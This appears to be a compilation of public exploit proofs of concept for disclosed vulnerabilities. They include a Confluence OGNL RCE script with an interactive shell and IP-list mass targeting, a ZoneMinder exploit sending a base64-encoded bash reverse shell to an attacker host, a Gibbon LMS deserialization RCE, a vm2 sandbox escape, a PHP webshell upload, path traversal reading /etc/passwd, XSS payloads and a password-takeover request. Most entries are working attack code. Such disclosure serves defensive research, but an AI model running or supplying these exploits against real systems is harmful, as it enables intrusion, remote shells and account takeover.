<pre><code># Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability<br /># Date: 25/1/2024<br /># Exploit Author: MaanVader<br /># Vendor Homepage: https://www.atlassian.com/software/confluence<br /># Software Link: https://www.atlassian.com/software/confluence<br /># Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3<br /># Tested on: 8.5.3<br /># CVE : CVE-2023-22527<br /><br /><br /><br />import requests<br />import argparse<br />import urllib3<br />from prompt_toolkit import PromptSession<br />from prompt_toolkit.formatted_text import HTML<br />from rich.console import Console<br /><br /># Disable SSL warnings<br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br /># Argument parsing<br />parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")<br />parser.add_argument("-u", "--url", help="Single Confluence Server URL")<br />parser.add_argument("-f", "--file", help="File containing list of IP addresses")<br />parser.add_argument("-c", "--command", help="Command to Execute")<br />parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")<br />args = parser.parse_args()<br /><br /># Rich console for formatted output<br />console = Console()<br /><br /># Function to send payload<br />def send_payload(url, command):<br /> headers = {<br /> 'Connection': 'close',<br /> 'Content-Type': 'application/x-www-form-urlencoded'<br /> }<br /> payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'<br /> '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')<br /> headers['Content-Length'] = str(len(payload))<br /> <br /> full_url = f"{url}/template/aui/text-inline.vm"<br /> response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)<br /> return response.text.split('<!DOCTYPE html>')[0].strip()<br /><br /># Interactive shell function<br />def interactive_shell(url):<br /> session = PromptSession()<br /> console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")<br /> while True:<br /> try:<br /> cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))<br /> if cmd.lower() in ["exit", "quit"]:<br /> break<br /> response = send_payload(url, cmd)<br /> console.print(response)<br /> except KeyboardInterrupt:<br /> break<br /> except Exception as e:<br /> console.print(f"[bold red]Error: {e}[/bold red]")<br /> break<br /><br /># Process file function<br />def process_file(file_path):<br /> with open(file_path, 'r') as file:<br /> for line in file:<br /> ip = line.strip()<br /> url = f"http://{ip}:8090"<br /> console.print(f"Processing {url}")<br /> print(send_payload(url, args.command))<br /><br /># Main execution logic<br />if args.shell and args.url:<br /> interactive_shell(args.url)<br />elif args.url and args.command:<br /> print(send_payload(args.url, args.command))<br />elif args.file and args.command:<br /> process_file(args.file)<br />else:<br /> print("Error: Please provide a valid URL and a command or use the interactive shell option.")<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field<br /># Date: 2023-08-21<br /># Exploit Author: Sinem Şahin<br /># Vendor Homepage: https://backdropcms.org/<br /># Version: 1.23.0<br /># Tested on: Windows & XAMPP<br /><br />==> Tutorial <==<br /><br />1- Go to the following url. => http://(HOST)/backdrop/node/add/post<br />2- Write your xss payload in the body of the post. Formatting options should be RAW HTML to choose from.<br />3- Press "Save" button.<br /><br />XSS Payload ==> "<script>alert("post_body")</script><br /><br /><br /></code></pre>
<pre><code>import re<br />import requests<br />from bs4 import BeautifulSoup<br />import argparse<br />import base64<br /><br /># Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots<br /># Date: 12 December 2023<br /># Discovered by : @Unblvr1<br /># Exploit Author: Ravindu Wickramasinghe (@rvizx9)<br /># Vendor Homepage: https://zoneminder.com/<br /># Software Link: https://github.com/ZoneMinder/zoneminder<br /># Version: prior to 1.36.33 and 1.37.33<br /># Tested on: Arch Linux, Kali Linux<br /># CVE : CVE-2023-26035<br /># Github Link : https://github.com/rvizx/CVE-2023-26035<br /><br /><br />class ZoneMinderExploit:<br /> def __init__(self, target_uri):<br /> self.target_uri = target_uri<br /> self.csrf_magic = None<br /><br /> def fetch_csrf_token(self):<br /> print("[>] fetching csrt token")<br /> response = requests.get(self.target_uri)<br /> self.csrf_magic = self.get_csrf_magic(response)<br /> if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic):<br /> print(f"[>] recieved the token: {self.csrf_magic}")<br /> return True<br /> print("[!] unable to fetch or parse token.")<br /> return False<br /><br /> def get_csrf_magic(self, response):<br /> return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None)<br /><br /> def execute_command(self, cmd):<br /> print("[>] sending payload..")<br /> data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic}<br /> response = requests.post(f"{self.target_uri}/index.php", data=data)<br /> print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")<br /><br /> def exploit(self, payload):<br /> if self.fetch_csrf_token():<br /> print(f"[>] executing...")<br /> self.execute_command(payload)<br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')<br /> parser.add_argument('-ip', '--local-ip', required=True, help='local ip')<br /> parser.add_argument('-p', '--port', required=True, help='port')<br /> args = parser.parse_args()<br /><br /> # generating the payload<br /> ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1" <br /> ps2 = base64.b64encode(ps1.encode()).decode()<br /> payload = f"echo {ps2} | base64 -d | /bin/bash"<br /><br /> ZoneMinderExploit(args.target_url).exploit(payload)<br /> <br /><br /></code></pre>
<pre><code>Exploit Title: WordPress File Upload < 4.23.3 Stored XSS (CVE 2023-4811)<br />Date: 18 December 2023<br />Exploit Author: Faiyaz Ahmad<br />Vendor Homepage: https://wordpress.com/<br />Version: 4.23.3<br />CVE : CVE 2023-4811<br /><br />Proof Of Concept:<br /><br />1. Login to the wordpress account<br /><br />2. Add the following shortcode to a post in "File Upload Plugin":<br /><br />[wordpress_file_upload redirect="true" redirectlink="*javascript:alert(1)*"]<br /><br />3. Upload any file on the resulting post.<br />4. After the upload completes, you will see the XSS alert in the browser.<br /><br /></code></pre>
<pre><code># Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on <br />the v26.0.00 version<br /># Date: 22.01.2024<br /># Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat <br />Guliev,Islam Rzayev )<br /># Vendor Homepage: https://gibbonedu.org/<br /># Software Link: https://github.com/GibbonEdu/core<br /># Version: v26.0.00<br /># Tested on: Ubuntu 22.0<br /># CVE : CVE-2024-24725<br /><br />import requests<br />import re<br />import sys<br />import base64<br />import urllib.parse<br /><br /><br />def login(target_host, target_port,email,password):<br /> url = f'http://{target_host}:{target_port}/login.php?timeout=true'<br /> headers = {"Content-Type": "multipart/form-data; <br />boundary=---------------------------174475955731268836341556039466"}<br /> data = <br />f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: <br />form-data; <br />name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: <br />form-data; <br />name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: <br />form-data; <br />name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: <br />form-data; <br />name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: <br />form-data; <br />name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: <br />form-data; <br />name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"<br /> r = requests.post(url, headers=headers, data=data, <br />allow_redirects=False)<br /> Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])<br /> if Session_Cookie[4] is not None and '/index.php' in <br />str(r.headers['Location']):<br /> print("[X] Login successful!")<br /><br /> return Session_Cookie[4]<br /><br /><br /><br />def generate_payload(command):<br /><br /> # Given base64-encoded string<br /> ### Actual Payload:<br /> ### <br />a:2:{i:7%3BO:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"%00*%00socket"%3BO:29:"Monolog\Handler\BufferHandler":7:{s:10:"%00*%00handler"%3Br:3%3Bs:13:"%00*%00bufferSize"%3Bi:-1%3Bs:9:"%00*%00buffer"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:COMMAND_SIZE:"COMMAND"%3Bs:5:"level"%3BN%3B}}s:8:"%00*%00level"%3BN%3Bs:14:"%00*%00initialized"%3Bb:1%3Bs:14:"%00*%00bufferLimit"%3Bi:-1%3Bs:13:"%00*%00processors"%3Ba:2:{i:0%3Bs:7:"current"%3Bi:1%3Bs:6:"system"%3B}}}i:7%3Bi:7%3B}<br /> base64_encoded_string = <br />'YToyOntpOjclM0JPOjMyOiJNb25vbG9nXEhhbmRsZXJcU3lzbG9nVWRwSGFuZGxlciI6MTp7czo5OiIlMDAqJTAwc29ja2V0IiUzQk86Mjk6Ik1vbm9sb2dcSGFuZGxlclxCdWZmZXJIYW5kbGVyIjo3OntzOjEwOiIlMDAqJTAwaGFuZGxlciIlM0JyOjMlM0JzOjEzOiIlMDAqJTAwYnVmZmVyU2l6ZSIlM0JpOi0xJTNCczo5OiIlMDAqJTAwYnVmZmVyIiUzQmE6MTp7aTowJTNCYToyOntpOjAlM0JzOkNPTU1BTkRfU0laRToiQ09NTUFORCIlM0JzOjU6ImxldmVsIiUzQk4lM0J9fXM6ODoiJTAwKiUwMGxldmVsIiUzQk4lM0JzOjE0OiIlMDAqJTAwaW5pdGlhbGl6ZWQiJTNCYjoxJTNCczoxNDoiJTAwKiUwMGJ1ZmZlckxpbWl0IiUzQmk6LTElM0JzOjEzOiIlMDAqJTAwcHJvY2Vzc29ycyIlM0JhOjI6e2k6MCUzQnM6NzoiY3VycmVudCIlM0JpOjElM0JzOjY6InN5c3RlbSIlM0J9fX1pOjclM0JpOjclM0J9'<br /><br /> command_size = len(command)<br /><br /> # Decode base64<br /> decoded_bytes = base64.b64decode(base64_encoded_string)<br /> decoded_string = decoded_bytes.decode('utf-8')<br /><br /> # URL decode<br /> payload = urllib.parse.unquote(decoded_string)<br /> # Replace placeholders in the decoded string<br /> payload = payload.replace('COMMAND_SIZE', str(command_size))<br /> payload = payload.replace('COMMAND', command)<br /> print("[X] Payload Generated!")<br /> return payload<br /><br /><br /><br />def rce(cookie, target_host, target_port, command):<br /> url = <br />f'http://{target_host}:{target_port}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'<br /> headers = {"Content-Type": "multipart/form-data; <br />boundary=---------------------------104550429928543086952438317710","Cookie": <br />cookie}<br /> payload = generate_payload(command)<br /> data = <br />f'-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; name="address"\r\n\r\n/modules/System <br />Admin/import_run.php\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="mode"\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="syncField"\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="syncColumn"\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="columnOrder"\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="columnText"\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="fieldDelimiter"\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="stringEnclosure"\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="filename"\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; name="csvData"\r\n\r\n"External Assessment","Assessment <br />Date","Student","Field Name Category","Field <br />Name","Result"\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="ignoreErrors"\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="Failed"\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--'<br /><br /> r = requests.post(url, headers=headers, data=data, <br />allow_redirects=False)<br /> print("[X] Request sent!")<br /><br /> start_index = r.text.find("<h2>Step 4 - Live Run</h2>")<br /> end_index = r.text.find("<div class", start_index)<br /> result = r.text[start_index+26:end_index].strip()<br /> if result != '':<br /> print("[X] Execution result: \n"+result)<br /> else:<br /> print("[X] Command failed or did not output anything.")<br /><br /> with open("pocresponse.html", "wb") as f:<br /> f.write(r.content)<br /><br />if __name__ == '__main__':<br /> if len(sys.argv) != 6:<br /> print("[X] Usage: script.py <target_host> <target_port> <email> <br /><password> <command>")<br /> sys.exit(1)<br /> cookie = login(sys.argv[1], sys.argv[2],sys.argv[3],sys.argv[4])<br /> rce(cookie, sys.argv[1], sys.argv[2], sys.argv[5])<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: UPS Network Management Card 4 - Path Traversal<br /># Google Dork: inurl:nmc inurl:logon.htm<br /># Date: 2023-12-19<br /># Exploit Author: Víctor García<br /># Vendor Homepage: https://www.apc.com/<br /># Version: 4<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br /># PoC:<br />curl -k<br />https://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd<br /><br />root:x:0:0:root:/home/root:/bin/sh<br />daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />bin:x:2:2:bin:/bin:/bin/sh<br />sys:x:3:3:sys:/dev:/bin/sh<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/bin/sh<br />man:x:6:12:man:/var/cache/man:/bin/sh<br />lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />mail:x:8:8:mail:/var/mail:/bin/sh<br />news:x:9:9:news:/var/spool/news:/bin/sh<br />uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />proxy:x:13:13:proxy:/bin:/bin/sh<br />www-data:x:33:33:www-data:/var/www:/bin/sh<br />backup:x:34:34:backup:/var/backups:/bin/sh<br />list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />dhcp:x:997:997::/var/run/dhcp:/bin/false<br />messagebus:x:998:998::/var/lib/dbus:/bin/false<br />mosquitto:x:999:999::/home/mosquitto:/bin/false<br />nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br /><br /></code></pre>
<pre><code>## Title: GASMARK PRO-1.0 File Upload RCE<br /><br />## Author: nu11secur1ty<br />## Date: 03/17/2024<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html<br />## Reference: https://portswigger.net/web-security/file-upload<br />## Reference: https://www.cloudflare.com/learning/security/what-is-remote-code-execution/<br /><br />## Description:<br />Vulnerable input:<br />`<input type="file" class="form-control" id="productImage"<br />name="productImage" style="width:auto;">`<br />This application suffers from shell upload and remote code execution<br />vulnerability, the attacker easily<br />can destroy this system, when he has credentials.<br /><br />STATUS: HIGH- Vulnerability CRITICAL<br /><br />[+]Exploit:<br />```PHP<br />POST /gasmark/gasmark/php_action/createclient.php HTTP/1.1<br />Host: pwnedhost.com<br />Cookie: PHPSESSID=1afinf22p9snl2nai24g29duuc<br />Content-Length: 1063<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: https://pwnedhost.com<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://pwnedhost.com/gasmark/gasmark/add_client.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Priority: u=0, i<br />Connection: close<br /><br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="currnt_date"<br /><br /><br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="name"<br /><br />pwned<br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="gender"<br /><br />Female<br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="mob_no"<br /><br />1234<br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="reffering"<br /><br />1234<br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="address"<br /><br />1234<br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="productImage"; filename="1nsi1deyou.php"<br />Content-Type: application/octet-stream<br /><br /><?php<br />// by nu11secur1ty - 2023<br />$fh = fopen('test.html', 'a');<br />fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');<br />fclose($fh);<br /><br />//nlink('test.html');<br />?><br /><br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="create"<br /><br /><br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB--<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/gasmark-pro-10-file-upload-rce.html)<br /><br />## Time spent:<br />00:25:00<br /><br /></code></pre>
<pre><code># Exploit Title: Nokia BMC Log Scanner Remote Code Execution<br /># Google Dork: N/A<br /># Date: November 29, 2023<br /># Exploit Author: Carlos Andres Gonzalez, Matthew Gregory<br /># Vendor Homepage: https://www.nokia.com/<br /># Software Link: N/A<br /># Version: 13<br /># Tested on: Linux<br /># CVE : CVE-2022-45899<br /><br />Description<br />The BMC Log Scanner web application, available on several hosts, is vulnerable to command injection<br />attacks, allowing for unauthenticated remote code execution. This vulnerability is especially significant<br />because this service runs as root.<br /><br />Steps to Reproduce:<br />In the Search Pattern field, type:<br /><br />;";command<br /><br />Replacing the word "command" above with any Linux command.<br />Root access can be confirmed with the id command or any other command that would require<br />root access, such as displaying the contents of the /etc/shadow file."<br /><br />This issue was fixed in version 13.1.<br /><br /></code></pre>
<pre><code>/*<br /># Exploit Title: vm2 Sandbox Escape vulnerability<br /># Date: 23/12/2023<br /># Exploit Author: Calil Khalil & Adriel Mc Roberts<br /># Vendor Homepage: https://github.com/patriksimek/vm2<br /># Software Link: https://github.com/patriksimek/vm2<br /># Version: vm2 <= 3.9.19<br /># Tested on: Ubuntu 22.04<br /># CVE : CVE-2023-37466<br />*/<br /><br />const { VM } = require("vm2");<br />const vm = new VM();<br /><br />const command = 'pwd'; // Change to the desired command<br /><br />const code = `<br />async function fn() {<br /> (function stack() {<br /> new Error().stack;<br /> stack();<br /> })();<br />}<br /><br />try {<br /> const handler = {<br /> getPrototypeOf(target) {<br /> (function stack() {<br /> new Error().stack;<br /> stack();<br /> })();<br /> }<br /> };<br /><br /> const proxiedErr = new Proxy({}, handler);<br /><br /> throw proxiedErr;<br />} catch ({ constructor: c }) {<br /> const childProcess = c.constructor('return process')().mainModule.require('child_process');<br /> childProcess.execSync('${command}');<br />}<br />`;<br /><br />console.log(vm.run(code));<br /> <br /></code></pre>
<pre><code># Vulnerability type: Incorrect Access Control<br /># Vendor: https://www.unit4.com/<br /># Product: Financials by Coda<br /># Product site: https://www.unit4.com/fr/products/financial-management-software<br /># Affected version: < 2023Q4<br /># Fixed version: 2023Q4<br /># Credit: Léo DRAGHI<br /># CVE: CVE-2024-28735<br /><br /># PROOF OF CONCEPT<br />The "Change Password" feature can be abused in order to modify the password of any user of the application.<br />The only conditions for an attacker are to have the credentials of a valid account (regardless of the profile) and to know the username of the target.<br /><br />POST /coda/rest/session/password HTTP/2<br />Host: <target><br /><snip><br /><br />{<br /> "user" : "<targeted_user>",<br /> "password" : "<attacker_user_password>",<br /> "company" : "<company>",<br /> "newPassword" : "<new_password_for_targeted_user",<br /> "tzOffset" :240<br />}<br /><br /># TIMELINE<br />– 30/10/2023: Vulnerability found<br />– 02/11/2023: Vendor informed<br />– 05/12/2023: Vendor fixed the issue<br />– 14/03/2024: Public disclosure<br /></code></pre>